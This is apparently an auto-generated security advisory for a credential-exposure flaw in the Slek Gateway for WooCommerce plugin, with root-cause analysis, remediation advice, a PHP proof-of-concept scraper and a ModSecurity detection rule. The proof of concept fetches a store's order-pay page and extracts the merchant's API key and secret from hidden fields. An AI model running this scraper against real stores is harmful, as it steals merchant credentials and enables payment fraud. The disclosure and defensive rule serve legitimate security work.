Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 11, 2026

CVE-2026-7626: Slek Gateway for WooCommerce <= 1.0 – Unauthenticated Insufficiently Protected Credentials via Payment Redirect Form Hidden Fields (slek-gateway-for-woocommerce)

CVE ID: CVE-2026-7626
Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 1.0
Patched Version:
Disclosed: May 10, 2026

Analysis Overview

Analysis

Atomic Edge analysis of CVE-2026-7626 (metadata-based): This vulnerability exposes the merchant's Slek API credentials (slek_key and slek_secret) to unauthenticated users during the payment redirect process in the Slek Gateway for WooCommerce plugin version 1.0. The CVSS score is 5.3, indicating medium severity with a network attack vector, low complexity, and no privileges required. The flaw resides in the wsb_handle_slek_payment_redirect() function.

Root Cause: Based on the CWE classification (CWE-200: Exposure of Sensitive Information) and the vulnerability description, the root cause is the plugin embedding sensitive API credentials directly into client-side HTML elements. The function generates a payment form with hidden input fields containing the slek_key and slek_secret, which any unauthenticated user can view by inspecting the page source or using browser DevTools. Additionally, the slek_secret is exposed as a plaintext GET parameter in the IPN callback URL within the same form. Atomic Edge research infers this pattern because the description explicitly states that the credentials are placed in a client-side form and in the IPN URL. No code diff is available to confirm the exact implementation, but the described behavior matches a common anti-pattern in which developers mistakenly treat hidden form fields as secure.

Exploitation: An attacker can exploit this vulnerability without authentication by placing an order on a WooCommerce store that uses this gateway. After placing the order, the attacker navigates to the WooCommerce order-pay page (typically /checkout/order-pay/{order_id}/). Before the JavaScript auto-submit fires, they can view the HTML source of the page or use browser DevTools to inspect the hidden fields in the payment redirect form, and extract the slek_key and slek_secret values from those fields. No special tools are required; only a standard web browser.

Remediation: The plugin developer must refactor the payment redirect handling so that API credentials are never exposed to the client. The correct approach is to store the slek_key and slek_secret server-side (e.g., in the options table or in environment variables) and use server-to-server communication with the Slek payment gateway. The IPN callback URL should carry a randomly generated, one-time token tied to the current order, not the static secret. Alternatively, if redirect-based payment is required, the plugin should use a server-side proxy that generates a temporary nonce or session-based identifier for the client-side form, keeping the actual credentials on the server.

Impact: Successful exploitation allows an unauthenticated attacker to obtain the merchant's Slek API credentials. With these credentials, the attacker can potentially impersonate the merchant in Slek API calls, initiate unauthorized refunds, modify payment settings, or extract transaction data. This could lead to financial theft, data breaches, and loss of merchant trust. The CVSS vector records a confidentiality impact of "none" but an integrity impact of "low", on the reasoning that the attacker can modify transactions or settings using the stolen credentials.

Proof of Concept (PHP)

<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7626 - Slek Gateway for WooCommerce <= 1.0 - Unauthenticated Insufficiently Protected Credentials via Payment Redirect Form Hidden Fields

// This PoC demonstrates how an unauthenticated attacker can extract the merchant's
// slek_key and slek_secret by viewing the HTML source of the order-pay page.
// It assumes the attacker has a valid order ID after placing an order.

// Configuration: change these values as needed
$target_url = 'http://example.com'; // Base URL of the vulnerable WordPress site
$order_id = 1234; // WooCommerce Order ID (obtained after placing an order)

// Construct the order-pay URL
$order_pay_url = rtrim($target_url, '/') . '/checkout/order-pay/' . $order_id . '/';

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $order_pay_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disables TLS certificate verification; only acceptable against a lab host
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("[ERROR] Failed to fetch order-pay page. HTTP code: $http_code\n");
}

// Extract the slek_key and slek_secret from hidden form fields
// The payment form is expected to contain hidden <input> elements named slek_key and slek_secret.
// We also look for the IPN callback URL containing slek_secret as a GET parameter.

$slek_key = '';
$slek_secret = '';
$ipn_url = '';

// Pattern to find slek_key in a hidden input
if (preg_match('/<input[^>]*name=["\']slek_key["\'][^>]*value=["\']([^"\']+)["\'][^>]*>/i', $response, $matches)) {
    $slek_key = $matches[1];
}

// Pattern to find slek_secret in a hidden input
if (preg_match('/<input[^>]*name=["\']slek_secret["\'][^>]*value=["\']([^"\']+)["\'][^>]*>/i', $response, $matches)) {
    $slek_secret = $matches[1];
}

// Pattern to find the IPN callback URL (may contain slek_secret as GET param)
// The form action or a hidden input may point to an IPN URL like:
// https://slek.example.com/ipn?slek_secret=...
if (preg_match('/<form[^>]*action=["\']([^"\']+slek[^"\']*)["\'][^>]*>/i', $response, $matches)) {
    // Decode HTML entities (e.g. &amp;) so the query string parses correctly
    $ipn_url = html_entity_decode($matches[1]);
    // Extract slek_secret from the URL if present; parse_url() returns null when there is no query
    parse_str((string) parse_url($ipn_url, PHP_URL_QUERY), $params);
    if (isset($params['slek_secret']) && empty($slek_secret)) {
        $slek_secret = $params['slek_secret'];
    }
}

// Output the extracted credentials
if (!empty($slek_key) || !empty($slek_secret)) {
    echo "[SUCCESS] Extracted Slek API credentials from order ID: $order_id\n";
    if (!empty($slek_key)) {
        echo "  slek_key: $slek_key\n";
    } else {
        echo "  [WARNING] slek_key not found in page source.\n";
    }
    if (!empty($slek_secret)) {
        echo "  slek_secret: $slek_secret\n";
    } else {
        echo "  [WARNING] slek_secret not found in page source.\n";
    }
    if (!empty($ipn_url)) {
        echo "  IPN URL: $ipn_url\n";
    }
} else {
    echo "[INFO] No Slek credentials found on the order-pay page.\n";
    echo "The plugin may not have rendered the payment form yet, or the page structure differs.\n";
    echo "Try using browser DevTools to manually inspect the page source.\n";
}
?>

ModSecurity Rule

# Requires SecResponseBodyAccess On. RESPONSE_BODY is only populated in phase 4, so the whole
# chain runs there; the id, phase and disruptive action belong on the first rule of the chain only.
SecRule REQUEST_URI "@rx ^/checkout/order-pay/\d+/$" \
    "id:20267626,phase:4,deny,status:403,chain,msg:'CVE-2026-7626 - Slek credentials exposed in HTML',severity:'CRITICAL',tag:'CVE-2026-7626'"
    SecRule REQUEST_METHOD "@streq GET" "chain"
        SecRule RESPONSE_BODY "@rx <input[^>]*name=[\"'](slek_key|slek_secret)[\"'][^>]*value=[\"'][^\"']+[\"'][^>]*>"
